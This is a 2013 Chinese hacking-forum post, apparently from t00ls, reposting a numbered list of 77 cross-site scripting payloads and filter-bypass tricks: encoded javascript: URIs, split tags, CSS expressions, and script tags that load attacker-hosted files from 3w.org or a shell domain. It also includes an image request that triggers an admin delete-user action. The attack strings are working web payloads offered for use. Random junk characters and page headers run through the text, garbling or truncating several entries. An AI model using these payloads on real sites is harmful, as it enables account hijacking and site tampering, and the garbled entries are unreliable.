找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2731|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
/ c; @' I* K& x( i; s( R(1)普通的XSS JavaScript注入
1 I) A$ i2 f: k7 X+ v; }6 a- |<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># G5 L5 O$ C- y1 m& k" h; L
(2)IMG标签XSS使用JavaScript命令
: b* W6 k  ?2 U+ ?, ]7 `( V4 S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* f/ h8 L/ B# o" f1 S* U
(3)IMG标签无分号无引号% m6 K' y8 ^- E5 [* K
<IMG SRC=javascript:alert(‘XSS’)>
1 e$ O; i& s/ l' e* M: S(4)IMG标签大小写不敏感
5 O  x: T. O( W  v, |6 z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>. w0 v3 d, s4 q( F8 ^
(5)HTML编码(必须有分号)
8 T0 N/ y8 z$ q. y& A" s# _; k<IMG SRC=javascript:alert(“XSS”)>
. u; L- N  v  N8 t( f3 m, d( c(6)修正缺陷IMG标签+ {7 U' x3 l* y7 E; m& k
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 l$ a& p. x: D# t* d! r; J

7 o7 L6 v$ R8 K% y+ E+ ^! S" `; u. C7 @8 ?9 w9 u+ W. Y
(7)formCharCode标签(计算器)
( c- U0 J+ X$ C7 W- Q! Z( o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 C. u( o5 l( U7 g$ I; E% ^! E2 F
(8)UTF-8的Unicode编码(计算器)1 g: _7 t: ^8 Q& H# }. z
<IMG SRC=jav..省略..S')>$ S5 y, L# X( }6 I- F( W0 K$ D
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ {/ P* c# N, _4 M8 {+ M
<IMG SRC=jav..省略..S')>; b) l* @  q: w
(10)十六进制编码也是没有分号(计算器)# i) R0 e. C) Z8 M5 n
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
8 B$ d- A' y# f- a2 O" g* _(11)嵌入式标签,将Javascript分开6 E! u( w- \2 w" _- w) H7 ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. e. X& X: b; B! j( f(12)嵌入式编码标签,将Javascript分开2 i3 U2 h% v" F+ A$ v/ C6 M  Y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' t; q2 U( b  a/ U/ j, K(13)嵌入式换行符$ V# ^' M5 X) I; c3 A' g+ B2 t3 o5 O% \
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" l) {6 `- g: o! \5 U, X8 [% U) B" z4 K(14)嵌入式回车  ]$ K% o6 h' [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ S! u1 I+ Y: A4 S- |(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- T6 Z, S. Y4 @, Z<IMG SRC=”javascript:alert(‘XSS‘)”>" W/ g, R& {" M' z, W
(16)解决限制字符(要求同页面)
" L) Q" o7 P' u<script>z=’document.’</script>
  u, t8 S  q% ^0 y( O9 E+ g. i<script>z=z+’write(“‘</script>4 |! I* w4 s0 R9 j! M
<script>z=z+’<script’</script>
1 Y4 I; f' t4 r; k' F) w! P<script>z=z+’ src=ht’</script>
. `* q' o8 |# c5 V9 {9 {, m<script>z=z+’tp://ww’</script>
1 Z. ]+ R) M& c. {" q" G8 [7 X<script>z=z+’w.shell’</script>
5 ^& C, {; h: J) h5 m8 R' C<script>z=z+’.net/1.’</script>
1 g4 _; q  I) n/ q" C  R<script>z=z+’js></sc’</script>
8 U8 D) ^+ ~+ v* N( s# a/ ~' O3 U1 x<script>z=z+’ript>”)’</script>9 D5 M4 @, S. J% ~
<script>eval_r(z)</script>! C' K/ @: P5 d; G4 ^# h
(17)空字符12-7-1 T00LS - Powered by Discuz! Board" J$ F1 B- t8 i3 `& V. f0 l  D8 D0 v* @
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
' E% C% }- J( q3 V0 y: nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 I6 k, U9 J8 _: V7 ~4 \(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 ^/ B3 k8 Q5 w* ]2 j8 gperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, K# X- @9 v7 \  `, \- V(19)Spaces和meta前的IMG标签
" V. v: X$ l) s0 E/ \6 R<IMG SRC=” javascript:alert(‘XSS’);”>) L& \" G. r1 |/ n
(20)Non-alpha-non-digit XSS
  A( R! q" x/ {) m<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( D: T- [4 P! `) k(21)Non-alpha-non-digit XSS to 2. m1 ?) I2 ~; ?" b; G9 W) v
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ A: ^. s3 {' b# w1 Y(22)Non-alpha-non-digit XSS to 3
, S0 t- A+ T6 ?  ~' D' R<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# J" ^5 J) R* m6 R+ ?; U(23)双开括号* ^4 G8 {- e' n( p
<<SCRIPT>alert(“XSS”);//<</SCRIPT>8 l4 Q5 f, v) H& F# B" t/ o& B* X
(24)无结束脚本标记(仅火狐等浏览器)
& U1 l$ t! v$ R: P% q4 W! E2 h& @<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 a9 z& C, F# X2 t- s( V- O
(25)无结束脚本标记2: r* s; r* S' p$ B; ?
<SCRIPT SRC=//3w.org/XSS/xss.js>
. @, h3 H. {3 P( i(26)半开的HTML/JavaScript XSS
/ [: F" H: q* K" A  n<IMG SRC=”javascript:alert(‘XSS’)”3 \, P4 Z, J, Y9 {
(27)双开角括号; R) [  S% s  E7 c! t) @: V
<iframe src=http://3w.org/XSS.html <
& b' B4 w2 V( u( g1 Q' n" z(28)无单引号 双引号 分号+ M$ u0 ]: p! g1 w7 G0 u" p5 Y
<SCRIPT>a=/XSS/  b& {6 Z* j- t+ g. \" R: N2 |
alert(a.source)</SCRIPT>
" y2 X( d4 j& m& q. O(29)换码过滤的JavaScript) L# m0 `  n, o
\”;alert(‘XSS’);//; E1 ^. k' e: N/ d& N5 a; ^
(30)结束Title标签. R: I/ f5 n  a$ D3 w3 \
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' A8 ~; d! e1 q% g0 |7 i1 L, x8 H(31)Input Image
. y* Y6 z0 j# o<INPUT SRC=”javascript:alert(‘XSS’);”>
2 ~8 W* T; u  E; ^$ p" S/ D1 L(32)BODY Image' y' o9 h8 ?" P. y6 @
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 X+ M! N, ?2 n3 D! q+ A4 {# x& \(33)BODY标签
. q  {! C. }- h$ `<BODY(‘XSS’)>, G: ~5 v0 g( R' N: g
(34)IMG Dynsrc! K5 g' W" G* w9 @* _  N
<IMG DYNSRC=”javascript:alert(‘XSS’)”>/ ~; ~7 @6 q" a% J% i! j$ o$ {
(35)IMG Lowsrc
+ ^- X6 c! k5 v( @9 d5 F+ A<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# x8 H5 m* Q9 q# Y  V(36)BGSOUND
" L, M6 R& u$ D& D* d0 F5 z' t<BGSOUND SRC=”javascript:alert(‘XSS’);”>
+ q5 K6 u3 Q$ w(37)STYLE sheet
+ Z3 `0 ]! ~0 h7 i) J" @$ a<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 S1 W' H  p! K# Y" k: S(38)远程样式表
, {2 u0 t- m: {9 E4 d) a<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 T& `7 _" u3 m9 D/ Z* D- @+ Y(39)List-style-image(列表式)( Q7 p9 p3 p# b% Y5 Y
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& y7 K+ Z! l% C2 q* D# x% G(40)IMG VBscript
; i5 n8 h% V! W<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% B7 q/ ^/ U. S(41)META链接url
9 R0 g3 p# x( X( r+ @: I& u4 q/ r- v9 J- R( o& O) N( i8 o; D

8 q! m* D' ~. ]$ Q: A/ D3 e<META HTTP-EQUIV=”refresh” CONTENT=”0;; ]8 ^9 _7 G6 ]) {1 {* |
URL=http://;URL=javascript:alert(‘XSS’);”>
% E' J; f. j! x(42)Iframe3 K' `% h6 f" {8 N; r6 Q& [
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( x) Y+ M' u' @: S
(43)Frame
* W& W4 a9 o/ ]% i! P1 y' c5 U<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board, _5 D: C2 N, v$ ^! c. d6 C) [
https://www.t00ls.net/viewthread ... table&tid=15267 3/6; ~5 n' j0 |) E7 ?$ l+ s2 M3 i
(44)Table0 \# P! `" j; }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>; U% n( f; T' s& S7 b
(45)TD- u8 O0 |1 ?$ y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' b9 \0 _( |- y
(46)DIV background-image
7 y, }6 j! E, v<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 t  J1 ], m" P, {" `  u7 M/ f, O' ?8 ~
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
5 A0 M5 G4 v  Y& L+ c8&13&12288&65279)
8 C' z/ L+ g5 Y' v<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" \! s  H0 C# k& D
(48)DIV expression
( Q, z1 A4 q% d<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 P6 @# b" {5 s" X& I6 z3 f# e$ i(49)STYLE属性分拆表达0 `! n4 j5 c. ?1 |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>6 I( i* ^6 }! S7 k( d0 Q
(50)匿名STYLE(组成:开角号和一个字母开头)/ h, S4 t6 M9 u( ?  M% G! L, {. z
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
: P$ k( Y4 A+ }' t(51)STYLE background-image" H1 D4 c0 k! Z9 s7 w
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A$ V' c7 @8 }* @% x+ X! B! a) }
CLASS=XSS></A>" \' |$ ]* P  ], m
(52)IMG STYLE方式
7 t$ _' {" n$ b. C9 ?, zexppression(alert(“XSS”))’>7 S7 v) Y/ Q  v+ i; O6 s
(53)STYLE background9 X3 X; ]9 |4 K0 o" ]- Y8 i+ P( Z7 D
<STYLE><STYLE/ A* Q+ n* r& r# z* Y
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>& i& C, G. d1 T; g" \5 s" M# F
(54)BASE
+ U3 q9 D$ t! q5 y# x! ]" q4 Y<BASE HREF=”javascript:alert(‘XSS’);//”># E# y" Y! V# B% i1 F3 a4 Y& p
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! Y: o' s! |5 h' A' |( e8 F1 O! p
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ D* m7 C9 f5 p1 @4 C
(56)在flash中使用ActionScrpt可以混进你XSS的代码2 p9 S3 {; K7 c' _9 P
a=”get”;
- w$ r: f- |5 X0 x$ @b=”URL(\”";& _  T8 B- S8 \9 j/ I7 }! j( ]" H8 S
c=”javascript:”;
( ]/ \; z: e8 @) K! m6 u  I; `d=”alert(‘XSS’);\”)”;+ @8 S  K8 N# e
eval_r(a+b+c+d);) D  v1 Y$ T' o9 C$ M6 r
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上- K0 d3 [9 @0 y3 G# S$ ~
<HTML xmlns:xss>
2 Y2 k, k6 ^2 |% A6 y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>6 X% {1 w, T9 `
<xss:xss>XSS</xss:xss>
2 [, S& ^8 M! w1 L; C; M9 W/ @1 i</HTML>
+ l! i) Q) s7 [' t2 {: g; u3 V(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) ]  ^3 N; N" ?5 U5 Y<SCRIPT SRC=””></SCRIPT>, n. r/ c, x" M: ~7 ]7 b
(59)IMG嵌入式命令,可执行任意命令
- K! L; h1 n9 X! w/ L9 M<IMG SRC=”http://www.XXX.com/a.php?a=b”>
+ g1 s/ b* v+ X, g+ S1 @) y4 w(60)IMG嵌入式命令(a.jpg在同服务器)8 x, x4 f  m3 @
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
+ @0 A' B8 t/ [  r6 h! S" Z(61)绕符号过滤2 Z) g/ I) x4 b  i: X% u
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 Z9 j, ^0 F& s  C5 q7 g* j2 h(62)6 o7 P7 b, M2 l8 D5 m- ^: o
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 ?" x/ g  ?2 p# e' [' V
(63): \& }4 W  h+ k7 K# H9 @; J: K
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>4 A% C- I' b) u' `3 K
(64)
+ t  j5 Q0 T! p# s: k<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 X5 w  K1 J3 H% }! a(65)
! J) [& a$ D2 n<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 B* |2 ^7 u) U# R# V9 D! Y# D$ e: Z(66)12-7-1 T00LS - Powered by Discuz! Board
2 G2 v' S0 ^% i; E' Ohttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 R0 V, E; j2 s9 Y6 ]& e$ g<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>9 i6 f- W3 `+ [2 e6 ~2 S$ I+ w! }) S
(67)9 Y; q* A$ d# j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
3 A$ [* l! h0 D4 S</SCRIPT>1 }/ H4 u" n0 A2 p/ C7 c2 G! z
(68)URL绕行& g% ^) _) M0 I5 C. J
<A HREF=”http://127.0.0.1/”>XSS</A>8 }+ V! s3 {( Q& a+ R" C
(69)URL编码0 }" m4 Y; m" r& }
<A HREF=”http://3w.org”>XSS</A>5 ~# q/ X- Z% @8 p
(70)IP十进制1 A/ A# O* {9 M6 `; j8 O/ M
<A HREF=”http://3232235521″>XSS</A>
5 A. b' I2 X+ M0 t(71)IP十六进制% Z! r1 L- T/ T- K" D' q& g
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>& r! g; a' w, S& Q
(72)IP八进制2 a* v+ p4 P6 P) |3 o4 a1 S, K
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
5 S0 k# X, N1 }) k: y3 x  L1 e(73)混合编码! S4 v2 |* U, d, X( Q
<A HREF=”h
7 I7 E6 q4 |; C  i  e" \/ stt p://6 6.000146.0×7.147/”">XSS</A>4 C) S  h% n7 X4 Y- f9 s6 o: U
(74)节省[http:]
1 l0 s' w, u8 }3 n6 H<A HREF=”//www.google.com/”>XSS</A>) F& ]  ?' V! d; ~: e
(75)节省[www]) h3 ^7 X/ n% W& U7 e
<A HREF=”http://google.com/”>XSS</A>
" i) \" D$ H  l7 L6 F+ {, b(76)绝对点绝对DNS7 q. W& n' o2 z/ S
<A HREF=”http://www.google.com./”>XSS</A>2 A, w7 i7 Q) H# R0 \& t
(77)javascript链接$ E! S3 S  v6 ~
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ O& U& E6 E4 e% p

. V5 A( x6 u0 [原文地址:http://fuzzexp.org/u/0day/?p=142 S2 U9 `9 Z! r" V- l
& Q& B3 T; ^1 I& P: E* N, ]1 e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表